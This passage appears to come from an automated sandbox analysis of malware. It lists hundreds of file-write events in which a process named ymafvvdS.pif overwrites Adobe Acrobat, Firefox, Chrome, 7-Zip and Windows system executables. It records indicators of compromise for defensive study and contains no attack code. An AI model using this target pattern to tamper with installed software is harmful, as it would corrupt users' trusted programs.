                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe (4 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe (3 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe (14 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe (14 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe (14 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe (11 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe (11 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe (11 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Mozilla Firefox\crashreporter.exe (14 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe (11 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Mozilla Firefox\firefox.exe (11 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe (14 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe (11 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Mozilla Firefox\pingsender.exe (14 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Mozilla Firefox\plugin-container.exe (14 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Mozilla Firefox\private_browsing.exe (14 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  File written: C:\Program Files\Mozilla Firefox\updater.exe (14 write events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Windows\System32\wbem\WmiApSrv.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Windows\System32\vds.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Windows\System32\alg.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\7-Zip\7zFM.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Windows\System32\snmptrap.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Windows\System32\Spectrum.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Windows\System32\Locator.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\7-Zip\7z.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Windows\System32\AppVClient.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif  System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
